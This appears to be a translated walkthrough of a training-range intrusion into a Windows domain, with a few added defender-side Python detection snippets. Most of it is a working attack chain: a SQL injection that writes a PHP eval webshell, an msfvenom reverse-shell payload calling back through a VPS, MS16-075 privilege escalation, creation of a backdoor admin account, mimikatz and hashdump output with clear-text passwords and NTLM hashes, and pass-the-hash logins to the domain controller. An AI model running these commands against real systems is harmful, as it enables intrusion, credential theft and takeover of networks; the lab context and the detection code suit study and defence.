0x00 Web SQL injection
We start from the URL http://afsgr16-b1ferw.aqlab.cn/?id=1. It takes an id=1 parameter, so we try SQL injection. Submitting id=1' produces an error message, which shows that the parameter is injectable and also leaks the web root C:\phpStudy\WWW\, so the target is a Windows host built with PHPstudy.
**Fatal error**: Call to a member function fetchAll() on a non-object in **C:\phpStudy\WWW\index.php** on line **56**
?id=1.1 union select 1,"<?php eval($_REQUEST[cmd]);?>" into outfile 'C:/phpstudy/www/114514.php'
That lets us write a shell to disk and gives us a webshell.
Connect with AntSword and check the current user; it is a low-privilege account, so the next step is privilege escalation.
C:\phpStudy\WWW> whoami
win-55ook7lana1\test
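Added defender-side example, not part of the original write-up: the Python below parses constructed Apache-style access-log lines that replay this section's requests and flags the quote probe, the union select, and the into outfile write into the web root. The log lines, client IPs and rule names are my own construction.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Constructed Apache-style access-log lines replaying the requests from this section
# (documentation-range client IPs; the outfile payload is the one shown above, URL-encoded
# and with the PHP body elided).
SAMPLE_LOG = """\
203.0.113.5 - - [16/Oct/2021:14:20:01 +0800] "GET /?id=1 HTTP/1.1" 200 1532
203.0.113.5 - - [16/Oct/2021:14:20:07 +0800] "GET /?id=1%27 HTTP/1.1" 200 311
203.0.113.5 - - [16/Oct/2021:14:21:40 +0800] "GET /?id=1.1%20union%20select%201,%22%3C?php%20...%22%20into%20outfile%20%27C:/phpstudy/www/114514.php%27 HTTP/1.1" 200 311
198.51.100.9 - - [16/Oct/2021:14:22:03 +0800] "GET /114514.php?cmd=whoami HTTP/1.1" 200 58
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Each rule runs against the fully URL-decoded query string.
RULES = [
    ("union select", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("server-side file write (into outfile/dumpfile)", re.compile(r"\binto\s+(?:out|dump)file\b", re.I)),
    ("php open tag in a parameter", re.compile(r"<\?php", re.I)),
    ("quote or comment sequence", re.compile(r"""['"]|--|/\*|#""")),
]

def parse_line(line):
    """Split one access-log line into client IP, path, raw query string and status."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    return {"ip": m.group("ip"), "path": path, "query": query, "status": int(m.group("status"))}

def classify(entry):
    """Return the names of every rule the request matches (empty for a clean request)."""
    decoded = unquote_plus(entry["query"])
    hits = [name for name, rx in RULES if rx.search(decoded)]
    for key, value in parse_qsl(entry["query"], keep_blank_values=True):
        if key == "id" and not re.fullmatch(r"\d+", value):  # this app's id is an integer
            hits.append("non-numeric id")
            break
    return hits

def scan_log(text):
    """Return (ip, path, hits) for every request that matches at least one rule."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        hits = classify(entry)
        if hits:
            findings.append((entry["ip"], entry["path"], hits))
    return findings
```

The fourth line (the later request to 114514.php) is not flagged by these rules alone; correlating new .php files in the web root with the outfile hit is what catches that stage.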
0x01 Port forwarding to reach msf
Because the target cannot reach our Kali VM directly, traffic has to be forwarded for it to connect to msf on the VM. frp is used for the forwarding here.
First you need a VPS with a public IP. Create frps.ini on it with the content below; only bind_port, the port used to talk to the client, needs to be changed. Run frps -c frps.ini
[common]
bind_port = 2021
Then create frpc.ini on the VM with the content below: server_addr is the VPS IP, server_port is the communication port set above, local_ip is the VM's IP, and traffic arriving on the VPS's remote_port is forwarded to local_port. Run frpc -c frpc.ini to start forwarding.
[common]
server_addr = <vps_ip>
server_port = 2021
[ssh]
type = tcp
local_ip = 192.168.32.128
local_port = 4444
remote_port = 4444
Then use msfvenom to generate the payload that reverse-connects to msf. The command is below, with LHOST set to the VPS IP and LPORT set to the remote_port above. Since the target is a Windows host, generate an exe.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<vps_ip> LPORT=4444 -f exe > payload.exe
Then run the following in msf on the VM:
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.32.128
LHOST => 192.168.32.128
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.32.128:4444
Upload payload.exe through the AntSword terminal and run it; the reverse shell comes back to msf through the port forward.
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.32.128:4444
[*] Sending stage (175174 bytes) to 192.168.32.128
[*] Meterpreter session 1 opened (192.168.32.128:4444 -> 192.168.32.128:57458) at 2021-10-16 14:33:03 +0800
meterpreter >
0x02 Privilege escalation
Next comes information gathering, then escalation.
In meterpreter, run shell to drop into a Windows cmd prompt, then run systeminfo to collect host information (the output can be saved to a file for easier review). The result is below: the OS is Microsoft Windows Server 2008 R2 Standard with two hotfixes installed, KB2999226 and KB976902.
主机名: WIN-55OOK7LANA1
OS 名称: Microsoft Windows Server 2008 R2 Standard
OS 版本: 6.1.7601 Service Pack 1 Build 7601
OS 制造商: Microsoft Corporation
OS 配置: 独立服务器
OS 构件类型: Multiprocessor Free
注册的所有人: Windows 用户
注册的组织:
产品 ID: 00477-001-0000421-84879
初始安装日期: 2020/6/12, 8:22:09
系统启动时间: 2021/10/9, 21:04:24
系统制造商: VMware, Inc.
系统型号: VMware Virtual Platform
系统类型: x64-based PC
处理器: 安装了 2 个处理器。
[01]: Intel64 Family 6 Model 62 Stepping 4 GenuineIntel ~2800 Mhz
[02]: Intel64 Family 6 Model 62 Stepping 4 GenuineIntel ~2800 Mhz
BIOS 版本: Phoenix Technologies LTD 6.00, 2018/12/12
Windows 目录: C:\Windows
系统目录: C:\Windows\system32
启动设备: \Device\HarddiskVolume1
系统区域设置: zh-cn;中文(中国)
输入法区域设置: zh-cn;中文(中国)
时区: (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量: 2,047 MB
可用的物理内存: 613 MB
虚拟内存: 最大值: 4,095 MB
虚拟内存: 可用: 2,266 MB
虚拟内存: 使用中: 1,829 MB
页面文件位置: C:\pagefile.sys
域: WORKGROUP
登录服务器: 暂缺
修补程序: 安装了 2 个修补程序。
[01]: KB2999226
[02]: KB976902
网卡: 安装了 1 个 NIC。
[01]: vmxnet3 以太网适配器
连接名: 本地连接
启用 DHCP: 是
DHCP 服务器: 10.0.1.1
IP 地址
[01]: 10.0.1.4
[02]: fe80::518:ffa:1f73:c4c2
windows-exploit-suggester can then be used to list candidate vulnerabilities. First update its database, then install xlrd, then run the query. system.txt holds the systeminfo output above.
$ python windows-exploit-suggester.py --update
[*] initiating winsploit version 3.3...
[+] writing to file 2021-10-16-mssb.xls
[*] done
$ pip install xlrd==1.2.0
$ python windows-exploit-suggester.py -d 2021-10-16-mssb.xls -i system.txt
There is a lot of output; here we pick MS16-075 for the escalation.
[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[*] https://github.com/foxglovesec/RottenPotato
[*] https://github.com/Kevin-Robertson/Tater
[*] https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege
[*] https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation
[*]
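As an added example (not from the write-up or from windows-exploit-suggester), the following Python parses the localized systeminfo output above into OS name, build number and installed KBs, and reports which required updates are absent; the KB3161561 mapping for MS16-075 is my assumption and should be verified against the bulletin.

```python
import re

# Constructed excerpt of the Chinese-localized systeminfo output shown above; the English
# labels are accepted as well so the same parser works on an en-US host.
SAMPLE_SYSTEMINFO = """\
主机名:           WIN-55OOK7LANA1
OS 名称:          Microsoft Windows Server 2008 R2 Standard
OS 版本:          6.1.7601 Service Pack 1 Build 7601
系统类型:         x64-based PC
修补程序:         安装了 2 个修补程序。
                  [01]: KB2999226
                  [02]: KB976902
网卡:             安装了 1 个 NIC。
                  [01]: vmxnet3 以太网适配器
"""

HOTFIX_RE = re.compile(r"^\s*\[\d+\]:\s*(KB\d+)\s*$", re.MULTILINE | re.IGNORECASE)
BUILD_RE = re.compile(r"\bBuild\s+(\d+)")
OS_NAME_RE = re.compile(r"^OS\s+(?:名称|Name):\s*(.+?)\s*$", re.MULTILINE)

# Assumption (verify against the bulletin): the Server 2008 R2 fix for MS16-075 shipped in
# KB3161561, so that KB's presence is what a defender checks for. Any KB in a set satisfies it.
REQUIRED_UPDATES = {"MS16-075": {"KB3161561"}}

def parse_systeminfo(text):
    """Return OS name, build number and the set of installed hotfixes, language-independent."""
    hotfixes = {kb.upper() for kb in HOTFIX_RE.findall(text)}
    build = BUILD_RE.search(text)
    name = OS_NAME_RE.search(text)
    return {
        "os_name": name.group(1) if name else None,
        "build": int(build.group(1)) if build else None,
        "hotfixes": hotfixes,
    }

def missing_updates(info, required=REQUIRED_UPDATES):
    """List the bulletins for which none of the satisfying KBs is installed."""
    return sorted(b for b, kbs in required.items() if not (kbs & info["hotfixes"]))

if __name__ == "__main__":
    info = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(info["os_name"], "build", info["build"], "hotfixes", sorted(info["hotfixes"]))
    print("missing:", missing_updates(info))
```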
run exploit/windows/local/ms16_075_reflection_juicy lhost=47.108.154.109 lport=4444
meterpreter > getuid
Server username: WIN-55OOK7LANA1\Administrator
net user so4ms abc123456.! /add
Adds a user.
net localgroup administrators so4ms /add
Adds the user to the local administrators group.
Token stealing to obtain SYSTEM privileges.
meterpreter > use incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
WIN-55OOK7LANA1\Administrator
WIN-55OOK7LANA1\cc
WIN-55OOK7LANA1\ms1
WIN-55OOK7LANA1\wf
WIN-55OOK7LANA1\xx
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
0x03 Information gathering
Dumping clear-text passwords
Use mimikatz to dump clear-text passwords. This fails with mimikatz x86 cannot access x64 process: mimikatz loads as 32-bit by default and many of its modules will not load against a 64-bit system that way, so the meterpreter process has to be migrated into a 64-bit process.
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x86/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
[!] Loaded x86 Kiwi on an x64 architecture.
Success.
meterpreter > kiwi_cmd privilege::debug
Privilege '20' OK
meterpreter > kiwi_cmd sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; mimikatz x86 cannot access x64 process
Process migration
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
896 1472 explorer.exe x64 2 WIN-55OOK7LANA1\Administrator C:\Windows\explorer.exe
meterpreter > migrate 896
[*] Migrating from 2992 to 896...
[*] Migration completed successfully.
Dump again, and we get the Administrator account's password, woshifengge1.
Authentication Id : 0 ; 371991 (00000000:0005ad17)
Session : RemoteInteractive from 2
User Name : Administrator
Domain : WIN-55OOK7LANA1
Logon Server : WIN-55OOK7LANA1
Logon Time : 2021/10/20 20:18:49
SID : S-1-5-21-968729399-1073357432-1689370247-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : WIN-55OOK7LANA1
* LM : 9ce0172ee7ebc970764a5f2b155e5903
* NTLM : 4d1de63584701c85b8b9eccf5243ef83
* SHA1 : e20325b7a39aaf06a30914a61c1be19388c058e8
tspkg :
* Username : Administrator
* Domain : WIN-55OOK7LANA1
* Password : woshifengge1.
wdigest :
* Username : Administrator
* Domain : WIN-55OOK7LANA1
* Password : woshifengge1.
kerberos :
* Username : administrator
* Domain : zkaq.cn
* Password : (null)
ssp :
[00000000]
* Username : a1021
* Domain : ZKAQ
* Password : A1B2C3!.Qa
credman :
Live hosts on the internal network
ifconfig
finds the target's internal IP, 10.0.1.4.
Interface 11
============
Name : vmxnet3
Hardware MAC : 00:0c:29:a6:55:d4
MTU : 1500
IPv4 Address : 10.0.1.4
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::518:ffa:1f73:c4c2
IPv6 Netmask : ffff:ffff:ffff:ffff::
Use the post/windows/gather/arp_scanner module to scan the same subnet.
meterpreter > run post/windows/gather/arp_scanner rhosts=10.0.1.4/24
[*] Running module against WIN-55OOK7LANA1
[*] ARP Scanning 10.0.1.4/24
[+] IP: 10.0.1.4 MAC 00:0c:29:a6:55:d4 (VMware, Inc.)
[+] IP: 10.0.1.3 MAC 00:0c:29:4f:81:ae (VMware, Inc.)
[+] IP: 10.0.1.8 MAC 00:0c:29:17:f5:7e (VMware, Inc.)
[+] IP: 10.0.1.9 MAC 00:0c:29:2b:63:ca (VMware, Inc.)
[+] IP: 10.0.1.1 MAC 00:0c:29:10:02:aa (VMware, Inc.)
[+] IP: 10.0.1.6 MAC 00:0c:29:5b:78:0b (VMware, Inc.)
[+] IP: 10.0.1.255 MAC 00:0c:29:a6:55:d4 (VMware, Inc.)
Port scanning internal hosts
To scan ports on internal hosts, first add a route.
run autoroute -s 10.0.1.0/24
adds the route.
meterpreter > run autoroute -s 10.0.1.0/24
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 10.0.1.0/255.255.255.0...
[+] Added route to 10.0.1.0/255.255.255.0 via 192.168.32.128
[*] Use the -p option to list all active routes
run autoroute -p
lists the routes that were added.
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
10.0.1.0 255.255.255.0 Session 2
Start a socks4a server.
msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set VERSION 4a
VERSION => 4a
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
Add socks4 127.0.0.1 1080 to /etc/proxychains.conf; nmap can then be run through proxychains to scan ports.
proxychains nmap -sT -Pn -p 22,80,445,3306,3389 10.0.1.0/24 --open
This scan is very slow, though. Since the live IPs on the subnet were already found, restricting the scan to just those IPs is a little faster.
proxychains nmap -sT -Pn -p 22,80,445,3306,3389 10.0.1.3 10.0.1.8 10.0.1.9 10.0.1.6 --open
Nmap scan report for 10.0.1.3
Host is up (12s latency).
Not shown: 4 closed ports
PORT STATE SERVICE
80/tcp open http
Nmap scan report for 10.0.1.8
Host is up (0.45s latency).
Not shown: 3 closed ports
PORT STATE SERVICE
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
Nmap scan report for 10.0.1.9
Host is up (0.20s latency).
Not shown: 1 closed port
PORT STATE SERVICE
80/tcp open http
445/tcp open microsoft-ds
3306/tcp open mysql
3389/tcp open ms-wbt-server
Nmap scan report for 10.0.1.6
Host is up (0.41s latency).
Not shown: 3 closed ports
PORT STATE SERVICE
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
Pass the hash
Hosts .6, .8 and .9 have port 445 open; only .8 accepted the pass-the-hash login.
hashdump
retrieves the hashes.
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 17e42cef0c5064217743f92bed737fa3...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:4d1de63584701c85b8b9eccf5243ef83:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test:1009:aad3b435b51404eeaad3b435b51404ee:77be122bef1c2d43f67721c95114f46b:::
shengxia:1013:aad3b435b51404eeaad3b435b51404ee:39f0f28ac072f26ea62ae53ae4786139:::
zx:1016:aad3b435b51404eeaad3b435b51404ee:c06e0b17f64c832a7d555168550ea75e:::
ms:1019:aad3b435b51404eeaad3b435b51404ee:2a8075a02dce44c2ed2af466b1f4f15f:::
xx:1021:aad3b435b51404eeaad3b435b51404ee:d5c485977ca5cf40e793cc99f0e51687:::
ms1:1022:aad3b435b51404eeaad3b435b51404ee:6886e033b9773dcaa2439416c561187f:::
cc:1023:aad3b435b51404eeaad3b435b51404ee:ce6d846f23351b24925b853f5a8f4c83:::
rxx:1024:aad3b435b51404eeaad3b435b51404ee:1b8b3b6223f73c08e22e99b2dd03003a:::
wf:1026:aad3b435b51404eeaad3b435b51404ee:62869a9d714197aca8b9c0f20e9e2884:::
so4ms:1027:aad3b435b51404eeaad3b435b51404ee:11d2fc51e410c0966a8e4a3530c963f8:::
Log in.
msf6 auxiliary(server/socks_proxy) > use exploit/windows/smb/psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set RHOSTS 10.0.1.8
RHOSTS => 10.0.1.8
msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set SMBUser Administrator
SMBUser => Administrator
msf6 exploit(windows/smb/psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:4d1de63584701c85b8b9eccf5243ef83
SMBPass => aad3b435b51404eeaad3b435b51404ee:4d1de63584701c85b8b9eccf5243ef83
msf6 exploit(windows/smb/psexec) > run
[*] 10.0.1.8:445 - Connecting to the server...
[*] 10.0.1.8:445 - Authenticating to 10.0.1.8:445 as user 'Administrator'...
[*] 10.0.1.8:445 - Selecting PowerShell target
[*] 10.0.1.8:445 - Executing the payload...
[+] 10.0.1.8:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 10.0.1.8:4444
[*] Sending stage (175174 bytes) to 10.0.1.8
[*] Meterpreter session 4 opened (10.0.1.4:41689 -> 10.0.1.8:4444) at 2021-10-22 14:12:27 +0800
Successfully logged in to host 10.0.1.8.
Domain information
ipconfig /all
shows the DNS server is 10.0.1.6, which means the domain controller's IP is 10.0.1.6.
C:\Windows\system32>ipconfig /all
ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : A1
Primary Dns Suffix . . . . . . . : zkaq.cn
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : zkaq.cn
localdomain
Ethernet adapter 本地连接 2:
Connection-specific DNS Suffix . : localdomain
Description . . . . . . . . . . . : vmxnet3 以太网适配器 #2
Physical Address. . . . . . . . . : 00-0C-29-17-F5-7E
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::81b8:ac83:7a57:b952%13(Preferred)
IPv4 Address. . . . . . . . . . . : 10.0.1.8(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Lease Obtained. . . . . . . . . . : 2021年10月19日 22:16:46
Lease Expires . . . . . . . . . . : 2021年10月22日 15:16:46
Default Gateway . . . . . . . . . : 10.0.1.1
DHCP Server . . . . . . . . . . . : 10.0.1.1
DHCPv6 IAID . . . . . . . . . . . : 268438569
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-26-74-83-9E-00-0C-29-A6-55-D4
DNS Servers . . . . . . . . . . . : 10.0.1.6
114.114.114.114
NetBIOS over Tcpip. . . . . . . . : Enabled
Listing the computers in the domain returns only one, A1, which is 10.0.1.8.
C:\Windows\system32>net view /domain:zkaq
net view /domain:zkaq
Server Name Remark
-------------------------------------------------------------------------------
\\A1
The command completed successfully.
Listing domain users shows that krbtgt is present.
C:\Windows\system32>net user /domain
net user /domain
The request will be processed at a domain controller for domain zkaq.cn.
User accounts for \\DC.zkaq.cn
-------------------------------------------------------------------------------
a1021 Administrator Guest
krbtgt nf
The command completed with one or more errors.
The domain administrator is Administrator.
C:\Windows\system32>net group "domain admins" /domain
net group "domain admins" /domain
The request will be processed at a domain controller for domain zkaq.cn.
Group name Domain Admins
Comment 指定的域管理员
Members
-------------------------------------------------------------------------------
Administrator
The command completed successfully.
NTLM
kiwi_cmd sekurlsa::msv
lists the NTLM hashes; this gives the domain Administrator's NTLM hash 61465a991b168727b65b3644aab823cd, which is what we need to log in to the domain controller.
meterpreter > kiwi_cmd privilege::debug
Privilege '20' OK
meterpreter > kiwi_cmd sekurlsa::msv
Authentication Id : 0 ; 381160 (00000000:0005d0e8)
Session : RemoteInteractive from 3
User Name : administrator
Domain : ZKAQ
Logon Server : DC
Logon Time : 2020/6/20 19:36:09
SID : S-1-5-21-4098506371-3349406080-1400905760-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : ZKAQ
* NTLM : 61465a991b168727b65b3644aab823cd
* SHA1 : 5b48c7f5a5facbb5df950bb501b9da8dcd86db3d
[00010000] CredentialKeys
* NTLM : 61465a991b168727b65b3644aab823cd
* SHA1 : 5b48c7f5a5facbb5df950bb501b9da8dcd86db3d
0x04 Logging in to the domain controller
With the domain Administrator's NTLM hash, use impacket to log in to the domain controller.
$ proxychains python3 smbexec.py -hashes :61465a991b168727b65b3644aab823cd ZKAQ/Administrator@10.0.1.6
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.24.dev1+20210922.102044.c7bc76f8 - Copyright 2021 SecureAuth Corporation
|S-chain|-<>-127.0.0.1:1080-<><>-10.0.1.6:445-<><>-OK
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>ipconfig /all
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
Windows IP 配置
主机名 . . . . . . . . . . . . . : DC
主 DNS 后缀 . . . . . . . . . . . : zkaq.cn
节点类型 . . . . . . . . . . . . : 混合
IP 路由已启用 . . . . . . . . . . : 否
WINS 代理已启用 . . . . . . . . . : 否
DNS 后缀搜索列表 . . . . . . . . : zkaq.cn
net user so4ms abc123456.! /add
Adds a user.
net localgroup administrators so4ms /add
Adds the user to the local administrators group.
The user was added successfully.
C:\Windows\system32>net localgroup administrators
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
别名     administrators
注释     管理员对计算机/域有不受限制的完全访问权
成员
-------------------------------------------------------------------------------
a1021
Administrator
Domain Admins
Enterprise Admins
nf
so4ms
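Added detection example for the psexec (0x03) and smbexec (0x04) service-based logins above, written by the editor rather than taken from the write-up: it scores constructed System-log 7045 service-installation records on the command shapes those tools leave behind. The BTOBTO name, the admin-share output redirection and the 8-letter random service name are assumptions about the tools' defaults, not facts from the page.

```python
import re

# Constructed export of System-log 7045 ("A service was installed in the system") records.
# Entry 1 mirrors what impacket smbexec's default service is assumed to look like; entry 2 mirrors
# the Metasploit psexec PowerShell target. Both shapes are assumptions, and the base64 is a placeholder.
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "vmtoolsd",
     "ImagePath": r'"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"'},
    {"EventID": 7045, "ServiceName": "BTOBTO",
     "ImagePath": r"%COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat"},
    {"EventID": 7045, "ServiceName": "tGqKxyVA",
     "ImagePath": r"%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e <base64-placeholder>"},
    {"EventID": 7036, "ServiceName": "Spooler", "ImagePath": ""},
]

# Each indicator is matched against the service's ImagePath (the command the SCM will run).
INDICATORS = [
    ("output redirected to an admin share", re.compile(r"\\\\127\.0\.0\.1\\[A-Za-z]\$\\", re.I)),
    ("cmd-wrapped batch file in %TEMP%", re.compile(r"%COMSPEC%.*%TEMP%\\\S+\.bat", re.I)),
    ("encoded PowerShell launched as a service",
     re.compile(r"powershell(?:\.exe)?\s.*\s-(?:e|enc|encodedcommand)\s", re.I)),
]
# A bare 8-letter name is common for legitimate services too (vmtoolsd above), so it only
# adds weight when an ImagePath indicator already fired.
RANDOM_NAME_RE = re.compile(r"^[A-Za-z]{8}$")

def score_service_install(event):
    """Return the indicator names matched by one record; [] for non-7045 or benign ones."""
    if event.get("EventID") != 7045:
        return []
    hits = [name for name, rx in INDICATORS if rx.search(event.get("ImagePath", ""))]
    if hits and RANDOM_NAME_RE.match(event.get("ServiceName", "")):
        hits.append("random 8-letter service name")
    return hits

def suspicious_service_installs(events):
    """Reduce a batch of records to (service name, indicators) for the ones worth triage."""
    out = []
    for ev in events:
        hits = score_service_install(ev)
        if hits:
            out.append((ev["ServiceName"], hits))
    return out
```

Both logins in the write-up also authenticate over SMB with NTLM (the psexec one with a hash rather than a password), so pairing these 7045 hits with the preceding 4624 logon type 3 from the pivot host gives the full picture.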
First go back to the session on 10.0.1.9 and run run getgui -e.
proxychains rdesktop -u administrator -p woshifengge1. 10.0.1.8
Remote desktop into 10.0.1.8, then log in to the domain controller from that host.
Connecting to the DC directly fails with Failed to connect, CredSSP required by server (check if server has disabled old TLS versions, if yes use -V option). so the connection has to be made from a domain-joined host.
The remote desktop login succeeds.